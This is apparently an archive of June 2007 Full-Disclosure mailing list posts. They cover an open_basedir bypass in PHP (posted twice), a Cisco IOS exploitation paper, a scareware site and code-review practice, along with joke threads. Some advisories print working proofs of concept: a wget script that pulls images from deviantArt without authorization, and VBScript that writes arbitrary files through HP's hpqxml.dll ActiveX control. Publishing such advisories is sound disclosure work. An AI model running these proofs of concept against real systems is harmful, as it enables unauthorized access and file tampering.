Re: [Full-disclosure] Apple Safari: idn urlbar spoofing
Michal Zalewski wrote: Whether Safari devs are to blame here exclusively, I'm not sure - IDN concept is by itself pretty evil, and this can be viewed simply a clever take on homograph attacks. I found out that firefox has a configuration property: network.IDN.blacklist_chars. It includes the character used in the demonstration (#x3164; - HANGULL FILLER) and many more. So, the problem seems to be known (at least in firefox). -- Robert Swiecki http://www.swiecki.net ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] PHP 5.2.3 PHP 4.4.7, htaccess safemode and open_basedir Bypass Vulnerability
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 Source: http://securityreason.com/achievement_securityalert/45 - -BEGIN PGP SIGNED MESSAGE- Hash: SHA1 [PHP 5.2.3 PHP 4.4.7, htaccess safemode and open_basedir Bypass Vulnerability ] Author: Maksymilian Arciemowicz (cXIb8O3) SecurityReason Date: - - - Written: 10.02.2007 - - - Public: 27.06.2007 SecurityReason Research SecurityAlert Id: 45 CVE: CVE-2007-3378 SecurityRisk: High Affected Software: PHP = 5.2.3 , PHP = 4.4.7 Advisory URL: http://securityreason.com/achievement_securityalert/45 Vendor: http://www.php.net - - --- 0.Description --- PHP is an HTML-embedded scripting language. Much of its syntax is borrowed from C, Java and Perl with a couple of unique PHP-specific features thrown in. The goal of the language is to allow web developers to write dynamically generated pages quickly. When using PHP as an Apache module, you can also change the configuration settings using directives in Apache configuration files (e.g. httpd.conf) and .htaccess files. You will need AllowOverride Options or AllowOverride All privileges to do so. php_value name value Sets the value of the specified directive. Can be used only with PHP_INI_ALL and PHP_INI_PERDIR type directives. To clear a previously set value use none as the value. Note: Don't use php_value to set boolean values. php_flag (see below) should be used instead. php_flag name on|off Used to set a boolean configuration directive. Can be used only with PHP_INI_ALL and PHP_INI_PERDIR type directives. mail.force_extra_parameters - Force the addition of the specified parameters to be passed as extra parameters to the sendmail binary. These parameters will always replace the value of the 5th parameter to mail(), even in safe mode http://pl.php.net/manual/en/configuration.changes.php - - --- 1. htaccess safemode and open_basedir Bypass Vulnerability --- When using PHP as an Apache module, you can also change the configuration settings using directives in .htaccess file. These options are used by a lot of users to change permissions options like display_errors etc. But it is possible to bypass a safe_mode or open_basedir in different functions.For example you can set session.save_path via .htaccess. In function session_save_path() and ini_set() save_path is checked for safe_mode and open_basedir. In .htaccess it is bypassed. Values from .htaccess are not checked. For example: cxib# ls -la /www/cxib/ total 14 drwxr-xr-x 3 cxib www 512 Feb 16 20:20 . drwxr-xr-x 11 www www 7168 Feb 16 20:07 .. - - -rw-r--r-- 1 cxib www53 Feb 16 20:19 stars.php drwxr-xr-x 2 cxib www 512 Feb 16 20:18 temps cxib# cat /www/cxib/stars.php ?php session_save_path(/inne); session_start(); ? cxib# telnet 0 80 Trying 0.0.0.0... Connected to 0. Escape character is '^]'. GET /cxib/stars.php HTTP/1.1 Host: localhost HTTP/1.1 200 OK Date: Fri, 16 Feb 2007 19:22:58 GMT Server: Apache/2.2.4 (FreeBSD) mod_ssl/2.2.4 OpenSSL/0.9.7e-p1 DAV/2 PHP/5.2.1 X-Powered-By: PHP/5.2.1 Content-Length: 732 Content-Type: text/html br / bWarning/b: session_save_path() [a href='function.session-save-path'function.session-save-path/a]: open_basedir restriction in effect. File(/inne) is not within the allowed path(s): (/www) in b/www/cxib/stars.php/b on line b2/bbr / br / bWarning/b: session_start() [a href='function.session-start'function.session-start/a]: open_basedir restriction in effect. File(/var/tmp/) is not within the allowed path(s): (/www) in b/www/cxib/stars.php/b on line b3/bbr / br / bFatal error/b: session_start() [lt;a href='function.session-start'gt;function.session-startlt;/agt;]: Failed to initialize storage module: files (path: ) in b/www/cxib/stars.php/b on line b3/bbr / Connection closed by foreign host. cxib# So we can't create session in directory. But when we create file .htaccess, we can write there: - - --- php_value session.save_path /inne - - --- cxib# ls -la /www/cxib/ total 16 drwxr-xr-x 3 cxib www 512 Feb 16 20:26 . drwxr-xr-x 11 www www 7168 Feb 16 20:26 .. - - -rw-r--r-- 1 cxib www34 Feb 16 20:26 .htaccess - - -rw-r--r-- 1 cxib www53 Feb 16 20:19 stars.php drwxr-xr-x 2 cxib www 512 Feb 16 20:18 temps cxib# cat /www/cxib/.htaccess php_value session.save_path /inne cxib# cat /www/cxib/stars.php ?php session_start(); ? We can't set session.save_path via ini_set() or session_save_path(). Let's try sending a request. cxib# telnet 0 80 Trying 0.0.0.0... Connected to 0. Escape character is '^]'. GET /cxib/stars.php HTTP/1.1 Host: localhost HTTP/1.1 200 OK Date: Fri, 16 Feb 2007 19:30:42 GMT Server: Apache/2.2.4 (FreeBSD) mod_ssl/2.2.4 OpenSSL/0.9.7e-p1 DAV/2 PHP/5.2.1 X-Powered-By: PHP/5.2.1 Set-Cookie: PHPSESSID=45cae9284f2f8b7cb05ce96021c9bf4e; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Content-Length: 0
[Full-disclosure] IOS Exploitation Techniques Paper
It has been more than a year since Michael Lynn first demonstrated a reliable code execution exploit on Cisco IOS at Black Hat 2005. Although his presentation received a lot of media coverage in the security community, very little is known about the attack and the technical details surrounding the IOS check_heaps() vulnerability. This paper is a result of research carried out by IRM to analyse and understand the check_heaps() attack and its impact on similar embedded devices. Furthermore, it also helps developers understand security-specific issues in embedded environments and developing mitigation strategies for similar vulnerabilities. The paper primarily focuses on the techniques developed for bypassing the check_heaps() process, which has traditionally prevented reliable exploitation of memory-based overflows on the IOS platform. Using inbuilt IOS commands, memory dumps and open source tools IRM was able to recreate the vulnerability in a lab environment. The paper is divided in three sections, which cover the ICMPv6 source-link attack vector, IOS Operating System internals, and finally the analysis of the attack itself. The full paper can be downloaded from: http://www.irmplc.com/index.php/69-Whitepapers ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] deviantArt does not check authorization for image download
Security Advisory
-
Title: deviantArt does not check authorization for image download
Risk Rating: High
Platforms: Any
Author: Timothy Redaelli [EMAIL PROTECTED]
Date: 27-06-2007
Overview
deviantArt does not apply any type of authorization checking for full-size
image download.
Details
---
It is possibile to download the full-size (as uploaded) image also if the
Download button is disabled.
Proof of Concept
#!/bin/sh
# Copyright (c) 2007 Timothy Redaelli [EMAIL PROTECTED]
URL=$1
download()
{
wget -U -nv $@
}
parse()
{
wget -U http://www.deviantart.com/download/$URL/ exit 0
URLS=$(wget -qU -O - http://www.deviantart.com/deviation/$URL/ |
fgrep 'deviantART.pageData' | sed -e 's/^.*fullview:
{[^}]*\(http[^]*\).*$/\1/' -e 's/\\//g' | awk -F / '{for (i = 0; i = 0xF;
i++) for (j = 0; j = 0xF; j++)
printf http://69.28.181.52/%s/f/%s/%s/%x/%x/%s\n;, $4, $6, $7, i, j, $10}')
}
parse $1
echo $URLS | while read x; do
download $x exit 0
done
Timeline
Mar 26, 2007 -- Bug discovery.
Mar 27, 2007 -- Contact deviantArt, no reply.
Jun 26, 2007 -- Recontact deviantArt, still no reply.
Jun 27, 2007 -- Bug published.
Credits
---
* Timothy Redaelli [EMAIL PROTECTED]
--
Timothy Redaelli
http://timothyredaelli.wordpress.com/
signature.asc
Description: This is a digitally signed message part.
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] PHP 5.2.3 PHP 4.4.7, htaccess safemode and open_basedir Bypass Vulnerability
Source: http://securityreason.com/achievement_securityalert/45 -BEGIN PGP SIGNED MESSAGE- Hash: SHA1 [PHP 5.2.3 PHP 4.4.7, htaccess safemode and open_basedir Bypass Vulnerability ] Author: Maksymilian Arciemowicz (cXIb8O3) SecurityReason Date: - - Written: 10.02.2007 - - Public: 27.06.2007 SecurityReason Research SecurityAlert Id: 45 CVE: CVE-2007-3378 SecurityRisk: High Affected Software: PHP = 5.2.3 , PHP = 4.4.7 Advisory URL: http://securityreason.com/achievement_securityalert/45 Vendor: http://www.php.net - --- 0.Description --- PHP is an HTML-embedded scripting language. Much of its syntax is borrowed from C, Java and Perl with a couple of unique PHP-specific features thrown in. The goal of the language is to allow web developers to write dynamically generated pages quickly. When using PHP as an Apache module, you can also change the configuration settings using directives in Apache configuration files (e.g. httpd.conf) and .htaccess files. You will need AllowOverride Options or AllowOverride All privileges to do so. php_value name value Sets the value of the specified directive. Can be used only with PHP_INI_ALL and PHP_INI_PERDIR type directives. To clear a previously set value use none as the value. Note: Don't use php_value to set boolean values. php_flag (see below) should be used instead. php_flag name on|off Used to set a boolean configuration directive. Can be used only with PHP_INI_ALL and PHP_INI_PERDIR type directives. mail.force_extra_parameters - Force the addition of the specified parameters to be passed as extra parameters to the sendmail binary. These parameters will always replace the value of the 5th parameter to mail(), even in safe mode http://pl.php.net/manual/en/configuration.changes.php - --- 1. htaccess safemode and open_basedir Bypass Vulnerability --- When using PHP as an Apache module, you can also change the configuration settings using directives in .htaccess file. These options are used by a lot of users to change permissions options like display_errors etc. But it is possible to bypass a safe_mode or open_basedir in different functions.For example you can set session.save_path via .htaccess. In function session_save_path() and ini_set() save_path is checked for safe_mode and open_basedir. In .htaccess it is bypassed. Values from .htaccess are not checked. For example: cxib# ls -la /www/cxib/ total 14 drwxr-xr-x 3 cxib www 512 Feb 16 20:20 . drwxr-xr-x 11 www www 7168 Feb 16 20:07 .. - -rw-r--r-- 1 cxib www53 Feb 16 20:19 stars.php drwxr-xr-x 2 cxib www 512 Feb 16 20:18 temps cxib# cat /www/cxib/stars.php ?php session_save_path(/inne); session_start(); ? cxib# telnet 0 80 Trying 0.0.0.0... Connected to 0. Escape character is '^]'. GET /cxib/stars.php HTTP/1.1 Host: localhost HTTP/1.1 200 OK Date: Fri, 16 Feb 2007 19:22:58 GMT Server: Apache/2.2.4 (FreeBSD) mod_ssl/2.2.4 OpenSSL/0.9.7e-p1 DAV/2 PHP/5.2.1 X-Powered-By: PHP/5.2.1 Content-Length: 732 Content-Type: text/html br / bWarning/b: session_save_path() [a href='function.session-save-path'function.session-save-path/a]: open_basedir restriction in effect. File(/inne) is not within the allowed path(s): (/www) in b/www/cxib/stars.php/b on line b2/bbr / br / bWarning/b: session_start() [a href='function.session-start'function.session-start/a]: open_basedir restriction in effect. File(/var/tmp/) is not within the allowed path(s): (/www) in b/www/cxib/stars.php/b on line b3/bbr / br / bFatal error/b: session_start() [lt;a href='function.session-start'gt;function.session-startlt;/agt;]: Failed to initialize storage module: files (path: ) in b/www/cxib/stars.php/b on line b3/bbr / Connection closed by foreign host. cxib# So we can't create session in directory. But when we create file .htaccess, we can write there: - --- php_value session.save_path /inne - --- cxib# ls -la /www/cxib/ total 16 drwxr-xr-x 3 cxib www 512 Feb 16 20:26 . drwxr-xr-x 11 www www 7168 Feb 16 20:26 .. - -rw-r--r-- 1 cxib www34 Feb 16 20:26 .htaccess - -rw-r--r-- 1 cxib www53 Feb 16 20:19 stars.php drwxr-xr-x 2 cxib www 512 Feb 16 20:18 temps cxib# cat /www/cxib/.htaccess php_value session.save_path /inne cxib# cat /www/cxib/stars.php ?php session_start(); ? We can't set session.save_path via ini_set() or session_save_path(). Let's try sending a request. cxib# telnet 0 80 Trying 0.0.0.0... Connected to 0. Escape character is '^]'. GET /cxib/stars.php HTTP/1.1 Host: localhost HTTP/1.1 200 OK Date: Fri, 16 Feb 2007 19:30:42 GMT Server: Apache/2.2.4 (FreeBSD) mod_ssl/2.2.4 OpenSSL/0.9.7e-p1 DAV/2 PHP/5.2.1 X-Powered-By: PHP/5.2.1 Set-Cookie: PHPSESSID=45cae9284f2f8b7cb05ce96021c9bf4e; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Content-Length: 0 Content-Type: text/html Connection closed by foreign host. cxib# cxib# ls
[Full-disclosure] Using Ajax for better and more convincing scams
Interesting use of Ajax/ Web 2.x by scammers hxxp://scanner.malwarealarm.com/5/scan.php Please replace hxxp by http It detected around 18 infections of Windows Malware on my GNU/ Linux machine for the following and more malware listed in this file: http://scanner.malwarealarm.com/5/fileslist.js And reported the following http://scanner.malwarealarm.com/5/images/popup.gif It was very helpful to offer the following remedies as well http://scanner.malwarealarm.com/5/images/Activex.gif It also detected around 15 open ports, hmmm, throughout my career I never came across that much BS. -- Sincerely Ajay Pal Singh Atwal ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] Planet Websecurity launched
http://christ1an.blogspot.com/2007/06/planet-websecurityorg-is-launching.html Those of you who have spoken to me recently may already be aware of this project, but for those who don't, I am pleased to announce the launch of Planet Websecurity, founded with the intention to bring together similarly themed news and rants related to Web security and to display them in one place. -- Best regards, christ1an http://christ1an.blogspot.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Static Code Analysis - Nuts and Bolts
What program(s) do you use in static code analysis? It doesn't matter if you are a hardcore grep+editor researcher or if you use complex frameworks: Tell me (and also the rest of the list) about it. Secure code review is one of the most mis-guided field where many security folks talks only about grep'ing for threat patterns. Offcourse I do not rule out it as a starting point but there are lot more to it. I have my own approach to secure code review: A simpler and easy to go approach is - a) Build up a Taxonomy of security coding errors specific to various platforms The taxonomy of coding errors defined by Gary McGraw (cigital.com) in famous book Software Security - Building Security In is good starting point to base line with. There are several such taxonomies of coding errors floating around but most of them seems to be flawed in some or the other way. I found McGraw's classification for errors (i.e. security flaws) to be useful and can be made a part of both manual and automatic code review. A nice write up on various such taxonomies can be found here - http://securesoftware.blogspot.com/2005/12/threat-vulnerabilities-classification.html Moving further you can refer CWE (http://cwe.mitre.org/data/dictionary.html) which presently seems to be superset of all common software weaknesses. b) Create a set of secure coding anti-patterns specific to various platforms Secure coding anti-patterns are commonly used poor solutions to common security problems. This comes handy in getting more accurate results when you run the anti-pattern cheat sheet through the code. For Example: * Use of an unbounded copy char buf[1024]; strcpy(buf, s); * Use of a bounded copy with incorrect calculations char buf[1024]; strncpy(buf, s, 1025); Both the above piece of code snippet is vulnerable. One more example is - not always a check for NULL value will take care of a NP (Null Pointer) dereference bug. i.e. there are many weak ways of preventing NP errors which doesn't warrant a *hard to break* protection. check out https://www.blackhat.com/presentations/win-usa-03/bh-win-03-schoenfeld.pdf http://developers.sun.com/learning/javaoneonline/j1sessn.jsp?sessn=TS-2594yr=2007track=5 google for secure coding antipatterns to find more references. c) Grep for anti-patterns or secure coding mistakes Use you favorite editor here and grep for all security anti-patterns. I am a great fan of SciTE which supports almost all languages. get it here http://scintilla.sourceforge.net/ Though this is an important phase during code review but definitely not an ultimate phase to find security holes. The important phase is what comes next i.e. Manual Data Flow (DF) and Control Flow (CF) analysis. d) Manual Data Flow (DF) and Control Flow (CF) analysis DF analysis - http://en.wikipedia.org/wiki/Data_flow_analysis CF analysis - http://en.wikipedia.org/wiki/Control_flow_graph Performing both DF and CF analysis manually takes lot of time but is definitely most important part of code review. It helps identifying accurate threats from security standpoint. This phase requires a master code security ninja's hand to ensure actual issues are captured. For example: Not always you see request.getparameter ( ) in java can be flagged for a potential XSS vector. In other words it is necessary to check - whether the data can be directly or indirectly be tampered by an malicious user at any given point of time to cause a successfull XSS attack - check whether the data is sanitised for malicious inputs before it is directly written to user page. - check whether the data is encoded before written back to user page similarly there are lot of such factors based on which a code reviewer will be able to decide whether the finding is actually a threat or not. Few code review optimization tricks - - know languages like python or ruby so that you can write some scripts to automate step c and d. - Every time you find unique anti-patterns do update your anti-pattern cheat sheet - For easiness decompose a big application into various modules for code review. - Prioritize the security anti-patterns based on your own skills to identify them faster and accurately. For example, I am fast at finding XSS anti-patterns compared to NP exceptions. So I'll push NP anti-patterns towards the end. - If at any point of time, a particular issue is taking more time to investigate then tag it for future review and move on to next. Thats all I have for now hope it helps. -d On 6/22/07, Paul Sebastian Ziegler [EMAIL PROTECTED] wrote: -BEGIN PGP SIGNED MESSAGE- Hash: SHA512 Hi list, due to personal interest I'd like to ask on your opinion regarding best practices for static code analysis. I guess most of us are accustomed to this method. After all - if you want to find a vulnerability that basically means that either luck, fuzzing or statical analysis will have something to do in the
Re: [Full-disclosure] Month of Random Hashes: DAY FOURTEEN
Month of Random Hashes wrote: [ITEM #1] == my hinney sha1: a25d7360e1294a6a6242ed4621d5d73347ea6398 Took a picture of my backend and would like to post the hash. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Month of Random Hashes: DAY FOURTEEN
lolololol On Wed, 27 Jun 2007 13:48:45 -0400 Jared DeMott [EMAIL PROTECTED] wrote: Month of Random Hashes wrote: [ITEM #1] == my hinney sha1: a25d7360e1294a6a6242ed4621d5d73347ea6398 Took a picture of my backend and would like to post the hash. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ -- Click here for free information on consolidating your debt. http://tagline.hushmail.com/fc/Ioyw6h4d717ubyV7TMblDDWJ6qoJbYKB9iGTdx5nFf7d0bOBSNixaI/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] IOS Exploitation Techniques Paper
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 Andy Davis [EMAIL PROTECTED] [2007-06-27 06:07] wrote: It has been more than a year since Michael Lynn first demonstrated a reliable code execution exploit on Cisco IOS at Black Hat 2005. Although his presentation received a lot of media coverage in the security community, very little is known about the attack and the technical details surrounding the IOS check_heaps() vulnerability. This paper is a result of research carried out by IRM to analyse and understand the check_heaps() attack and its impact on similar embedded devices. Furthermore, it also helps developers understand security-specific issues in embedded environments and developing mitigation strategies for similar vulnerabilities. The paper primarily focuses on the techniques developed for bypassing the check_heaps() process, which has traditionally prevented reliable exploitation of memory-based overflows on the IOS platform. Using inbuilt IOS commands, memory dumps and open source tools IRM was able to recreate the vulnerability in a lab environment. The paper is divided in three sections, which cover the ICMPv6 source-link attack vector, IOS Operating System internals, and finally the analysis of the attack itself. The full paper can be downloaded from: http://www.irmplc.com/index.php/69-Whitepapers As Andy stated, the IOS Exploitation Techniques whitepaper covers details regarding IOS vulnerabilities which have been previously disclosed. Further information regarding the vulnerabilities used in the exploit were resolved across two separate Cisco security advisories released in 2005. The first advisory covered the attack vector: Cisco Security Advisory: IPv6 Crafted Packet Vulnerability http://www.cisco.com/warp/public/707/cisco-sa-20050729-ipv6.shtml and the second advisory covered the underlying vulnerability which allowed for the possibility of remote code execution: Cisco Security Advisory: IOS Heap-based Overflow Vulnerability in System Timers. http://www.cisco.com/warp/public/707/cisco-sa-20051102-timers.shtml Cisco customers should reference those advisories (and more recently released advisories) to determine the version(s) of software needed to remediate any vulnerabilities within their network. We would like to thank Andy for his continued cooperation with us in the spirit of responsible disclosure and working to increase awareness of security issues. For information on working with the Cisco PSIRT regarding potential security issues, please see our contact information at http://www.cisco.com/en/US/products/products_security_vulnerability_policy.html Thanks. - -Mike- - -- Mike Caudill [EMAIL PROTECTED] PSIRT Incident Manager DSS PGP: 0xEBBD5271 +1.919.392.2855 / +1.919.522.4931 (cell) http://www.cisco.com/go/psirt -BEGIN PGP SIGNATURE- Version: GnuPG v1.4.2.2 (GNU/Linux) iD8DBQFGgqcXimPJSeu9UnERAoDCAJ9mKjGzZiG2/JDWMq1ACj6D0uPZ6QCg7Wyb a2KrlweRQMo8OMOdvTzU5Ks= =lMUS -END PGP SIGNATURE- ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Month of Random Hashes: DAY FOURTEEN
LOLOLOLOLOLOL On Wed, 27 Jun 2007 17:50:55 -0400 Brian Mariani - Shellcode SRL [EMAIL PROTECTED] wrote: Lolololololololololololo too -Message d'origine- De : [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED] De la part de Joey Mengele Envoyé : mercredi, 27. juin 2007 20:18 À : [EMAIL PROTECTED]; [EMAIL PROTECTED] Cc : full-disclosure@lists.grok.org.uk Objet : Re: [Full-disclosure] Month of Random Hashes: DAY FOURTEEN lolololol On Wed, 27 Jun 2007 13:48:45 -0400 Jared DeMott [EMAIL PROTECTED] wrote: Month of Random Hashes wrote: [ITEM #1] == my hinney sha1: a25d7360e1294a6a6242ed4621d5d73347ea6398 Took a picture of my backend and would like to post the hash. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ -- Click here for free information on consolidating your debt. http://tagline.hushmail.com/fc/Ioyw6h4d717ubyV7TMblDDWJ6qoJbYKB9iGT dx5nFf7d0 bOBSNixaI/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ -- Click here for free information on consolidating your debt. http://tagline.hushmail.com/fc/Ioyw6h4d7163JCJ2KMrlUQGtl3yOYnd09cPVIAXhwAPtSSIkkc1QhC/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Static Code Analysis - Nuts and Bolts
I agree with Debasis. I spent a year and a half in an Infosec Office doing code audits for E-Commerce web apps. I tried various open source automated tools and found that most of them missed the vast majority of exploitable vulnerabilities. In my experience, nothing beats a line-by-line analysis of the code by someone who knows what to look for. Yes, it's time consuming and completely impractical for sufficiently large applications, but it's more effective than the tools I tried out. As for estimating time requirements for line-by-line analysis, I've always been a fan of under promising and over delivering, and found I could bid successfully at about a minute per line of code, from there calculate your hourly rate accordingly. I wish I could have tried out some commercial tools, but we were too cheap for that. When dealing with web apps, walk through the application, note all user inputs and even those useless hidden fields that so many web app developers are fond of using, trace through the code and verify that the developer is validating and sanitizing those inputs correctly. If you want to be really anal (we are talking security here right?), then you should also verify that database inputs are also validated and sanitized and outputs sent back to the user. When you're dealing with E-Commerce apps, it's hard to be too paranoid. For web app testing, proxies like Web Scarab from OWASP are invaluable. Haven't tried Paros but it sounds excellent. Cheers. On 6/27/07, Debasis Mohanty [EMAIL PROTECTED] wrote: 8 snip 8 Though this is an important phase during code review but definitely not an ultimate phase to find security holes. The important phase is what comes next i.e. Manual Data Flow (DF) and Control Flow (CF) analysis. d) Manual Data Flow (DF) and Control Flow (CF) analysis DF analysis - http://en.wikipedia.org/wiki/Data_flow_analysis CF analysis - http://en.wikipedia.org/wiki/Control_flow_graph Performing both DF and CF analysis manually takes lot of time but is definitely most important part of code review. It helps identifying accurate threats from security standpoint. This phase requires a master code security ninja's hand to ensure actual issues are captured. -- [EMAIL PROTECTED] ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] [GOODFELLAS - VULN] hpqxml.dll 2.0.0.133 from HP Digital Imaging Arbitary Data Write.
:. GOODFELLAS Security Research TEAM .: :. http://goodfellas.shellcode.com.ar .: hpqxml.dll 2.0.0.133 from HP Digital Imaging Arbitary Data Write === Internal ID: VULWAR200706275. Introduction hpqxml.dll is a library included in the HP Photo Digital Imaging software package from the HP Company. http://www.hp.com. Link: http://www.hp.com/united-states/consumer/digital_photography/home_f.html Tested In - Windows XP SP2 english/french with IE 6.0 / 7.0. - Windows vista Professional English/French SP1 with IE 7.0 Summary The saveXMLAsFile method doesn't check if it is being called from the application or from a malicious user. Impact The vulnerability is due to an error in the saveXMLAsFile method that manipulate local files insecurely, which could allow malicious users to write arbitrary data to any file on a vulnerable system. Besides, the method does not check the file headers before writing. Workaround - Activate the Kill bit zero in clsid:9C0A0321-B328-466C-8ECA-B9A5522466D3. - Unregister hpqxml.dll using regsvr32. Timeline June 27, 2007 -- Bug discovery. June 27, 2007 -- Bug published. Credits * Brian Mariani [EMAIL PROTECTED] * GoodFellas Security Research Team goodfellas.shellcode.com.ar Technical Detail saveXMLAsFile method receives a filename as an argument, with this format c:\path\file. Proof of Concept html head titleHpqxml.dll 2.0.0.133 HP Digital Imaging Arbitary Data Write/title /head body h3Hpqxml.dll 2.0.0.133 HP Digital Imaging Arbitary Data Write/h3br object classid='clsid:9C0A0321-B328-466C-8ECA-B9A5522466D3' id='target' //object input language=VBScript onclick=HP() type=button value=Proof of Concept script language = 'vbscript' Sub HP() filename = C:\NTDETECT_.COM target.saveXMLAsFile filename End Sub /script /body /html ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Month of Random Hashes: DAY FOURTEEN
Send it over here. The picture, not the hash. I have the technologies to determine whether the image is computer generated, digitally altered, or legitimately a real picture! These technologies shall be unveiled at Blackhat during my presentation. Sometimes it is difficult to determine which asses are real in this facade that is the computer security world. - doc neal http://www.hackerfactor.com/blog/ ps: if time provides during my speech, I will discuss the many difficulties I have experienced as a computer security consultant while attempting to have fake myspace accounts shut down for my clients! On Wed, Jun 27, 2007 at 01:48:45PM -0400, Jared DeMott wrote: Month of Random Hashes wrote: [ITEM #1] == my hinney sha1: a25d7360e1294a6a6242ed4621d5d73347ea6398 Took a picture of my backend and would like to post the hash. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] Persistent XSS and CSRF and on network appliance
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 The HTTP interface of a network appliance has been researched and found to be vulnerable to several persistent XSS and CSRF. Such research was done by pdp (architect) and myself. We informed the vendor and will publish the details when a fix is available. The following is the MD5 hash for the advisory file. $ md5sum.exe research.txt 3db1d71fc3a0eae119617b3b1124206f *research.txt Regards, - -- pagvac [http://gnucitizen.org, http://ikwt.com/] -BEGIN PGP SIGNATURE- Version: GnuPG v1.4.2.2 (MingW32) iD8DBQFGgsGdjXB4hX6OC/cRAnwiAKCVI2JC4JNMvWXa3U/4b7WlH4FIfwCg1bL9 4ch1PaYvt6TSWtKVJX2cfgs= =Ls8N -END PGP SIGNATURE- ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] Persistent XSS and CSRF on network appliance [subject corrected :) ]
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 The HTTP interface of a network appliance has been researched and found to be vulnerable to several persistent XSS and CSRF. Such research was done by pdp (architect) and myself. We informed the vendor and will publish the details when a fix is available. The following is the MD5 hash for the advisory file. $ md5sum.exe research.txt 3db1d71fc3a0eae119617b3b1124206f *research.txt Regards, - -- pagvac [http://gnucitizen.org, http://ikwt.com/] -BEGIN PGP SIGNATURE- Version: GnuPG v1.4.2.2 (MingW32) iD8DBQFGgsJGjXB4hX6OC/cRAlVFAJwLfy2ByAZz0cgjx4+/H7NaWMpwXQCff/T9 x6VqTYC1FTecOaPnRjEqm08= =GgsZ -END PGP SIGNATURE- ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Month of Random Hashes: DAY FOURTEEN
Dr. Neal Krawetz PhD wrote: Send it over here. The picture, not the hash. I have the technologies to determine whether the image is computer generated, digitally altered, or legitimately a real picture! These technologies shall be unveiled at Blackhat during my presentation. Sometimes it is difficult to determine which asses are real in this facade that is the computer security world. - doc neal http://www.hackerfactor.com/blog/ ps: if time provides during my speech, I will discuss the many difficulties I have experienced as a computer security consultant while attempting to have fake myspace accounts shut down for my clients! hahahahahahha. believe me, no one really wants to see it! ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Persistent XSS and CSRF on network appliance [subject corrected :) ]
Please provide the original content of research.txt so I can verify that the hash is correct. I will also need the hash of your md5sum.exe. Thanks. J On Wed, 27 Jun 2007 16:02:16 -0400 pagvac [EMAIL PROTECTED] wrote: The HTTP interface of a network appliance has been researched and found to be vulnerable to several persistent XSS and CSRF. Such research was done by pdp (architect) and myself. We informed the vendor and will publish the details when a fix is available. The following is the MD5 hash for the advisory file. $ md5sum.exe research.txt 3db1d71fc3a0eae119617b3b1124206f *research.txt Regards, -- pagvac [http://gnucitizen.org, http://ikwt.com/] -- Click here for free information on consolidating your debt. http://tagline.hushmail.com/fc/Ioyw6h4d717AWsBGaRw0XRcSdPtiOutR2LutWBLFUUILfQosdj12pq/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Persistent XSS and CSRF on network appliance [subject corrected :) ]
